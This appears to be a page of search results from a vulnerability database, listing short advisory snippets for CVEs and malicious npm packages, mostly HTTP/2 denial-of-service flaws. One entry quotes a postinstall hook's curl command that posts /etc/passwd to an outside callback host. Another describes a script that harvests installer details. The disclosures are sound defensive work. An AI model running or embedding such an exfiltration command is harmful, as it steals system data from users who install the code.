1705 matches found
SUSE SLES12 Security Update : google-osconfig-agent (SUSE-SU-2026:2347-1)
The remote SUSE Linux SLES12 / SLESSAP12 host has a package installed that is affected by a vulnerability as referenced in the SUSE-SU-2026:2347-1 advisory. This update for google-osconfig-agent fixes the following issue - CVE-2026-33186: google.golang.org/grpc: authorization bypass due to improp...
CVE-2026-48748
Netty is a network application framework for development of protocol servers and clients. Prior to version 4.2.15.Final, a memory exhaustion vulnerability in the Netty HTTP/3 codec allows the creation of an infinite number of blocked streams, which can cause OOM error. Version 4.2.15.Final patche...
EUVD-2026-36488
The use of insecure HTTP transport within AMD optional tools could allow an attacker to conduct a man-in-the-middle attack, potentially leading to arbitrary code execution...
CVE-2026-40677
The use of insecure HTTP transport within AMD optional tools could allow an attacker to conduct a man-in-the-middle attack, potentially leading to arbitrary code execution...
CVE-2026-40677
The vulnerability CVE-2026-40677 affects AMD optional tools that use insecure HTTP transport, enabling a potential attacker to perform a man-in-the-middle attack and potentially achieve arbitrary code execution. The issue stems from unencrypted transport within these tools, which could allow inte...
CVE-2026-47244 Netty HTTP/2: Advertised MAX_CONCURRENT_STREAMS are not enforced
Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, DefaultHttp2Connection.DefaultEndpoint initialises maxActiveStreams/maxStreams to Integer.MAXVALUE, and Http2Settings never inserts...
@grpc/grpc-js: A malformed request can cause a server crash
Impact An invalid incoming HTTP/2 stream initiation can cause a server process to crash. This affects all servers created using @grpc/grpc-js. Patches The following version have fixes for this vulnerability: - 1.9.16 - 1.10.12 - 1.11.4 - 1.12.7 - 1.13.5 - 1.14.4 Workarounds There is no workaround...
httpd: HTTP/2: Remote Denial of Service via compression bomb and Slowloris-style attack
A flaw was found in HTTP/2, affecting various web servers. A remote attacker can exploit this vulnerability by combining an HPACK compression bomb with a zero-byte flow-control window. This technique allows a small amount of data to expand into large memory allocations on the server, which are th...
Malicious code in @shell-cabinet/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...
MAL-2026-5425 Malicious code in @oplus/obus-web-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 956ecc19633177f7ef9b458e6407ffbba6c8366688249c07bfd7f3c8e85c17a9 On npm install, the package's scripts/postinstall.js collects the installer's username os.userInfo, hostname os.hostname, current working directory...
EUVD-2026-35588
Uncontrolled resource consumption in HTTP/2 allows an unauthorized attacker to deny service over a network...
Tenda W15E 安全漏洞
The Tenda W15E is a wireless router produced by the Chinese company Tenda. The version 15.11.0.10 of the Tenda W15E contains a security vulnerability. This vulnerability stems from a buffer overflow in the picCropName parameter of the formCropAndSetWewifiPic function, which could allow attackers ...
CVE-2026-43973 gun HTTP/1.1 response buffer has no size limit allowing server-controlled memory exhaustion
Uncontrolled Resource Consumption vulnerability in ninenines gun gunhttp module allows a malicious server to exhaust client memory via unbounded HTTP/1.1 response buffering. In gunhttp:handle/5, three clauses accumulate incoming TCP data into the connection's buffer field using binary concatenati...
PT-2026-47301
Name of the Vulnerable Software and Affected Versions Routinator affected versions not specified Description Routinator exits upon encountering any error while accepting incoming HTTP or RTR connections. This includes recoverable errors, such as exhausting available file descriptors. An attacker...
UBUNTU-CVE-2026-10725
Protocol::HTTP2 versions before 1.13 for Perl is vulnerable to a HTTP/2 Bomb. Protocol::HTTP2's inbound HPACK path has no header-list size limit, so a small HTTP/2 request can expand into large server memory the "HTTP/2 bomb". The headersdecode method materialises a full key+value copy per indexe...
EUVD-2026-34964
Protocol::HTTP2 versions through 1.12 for Perl is vulnerable to a HTTP/2 Bomb. Protocol::HTTP2's inbound HPACK path has no header-list size limit, so a small HTTP/2 request can expand into large server memory the "HTTP/2 bomb". The headersdecode method materialises a full key+value copy per index...
CVE-2026-10725
Protocol::HTTP2 versions before 1.13 for Perl is vulnerable to a HTTP/2 Bomb. Protocol::HTTP2's inbound HPACK path has no header-list size limit, so a small HTTP/2 request can expand into large server memory the "HTTP/2 bomb". The headersdecode method materialises a full key+value copy per indexe...
Protocol::HTTP2 安全漏洞
Protocol::HTTP2 is a Ruby protocol library developed by CROX’s individual developers, which implements functions for encoding/decoding HTTP/2 protocols, frame handling, and connection management. Versions of Protocol::HTTP2 prior to 1.12 contained security vulnerabilities. These vulnerabilities...
CVE-2026-34288
Vulnerability in the Oracle Identity Manager Connector product of Oracle Fusion Middleware component: Core. The supported version that is affected is 12.2.1.4.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Identity Manager...
[SECURITY] Fedora 43 Update: libre-4.8.1-1.fc43
Libre is a generic library for real-time communications with async I/O support. Features are a SIP stack RFC 3261, SDP, RTP and RTCP, SRTP and SRTCP Secure RTP, DNS client, STUN/TURN/ICE stack, BFCP, HTTP stack with client/server, Websockets, Jitter buffer, async I/O poll, epoll, select, kqueue,...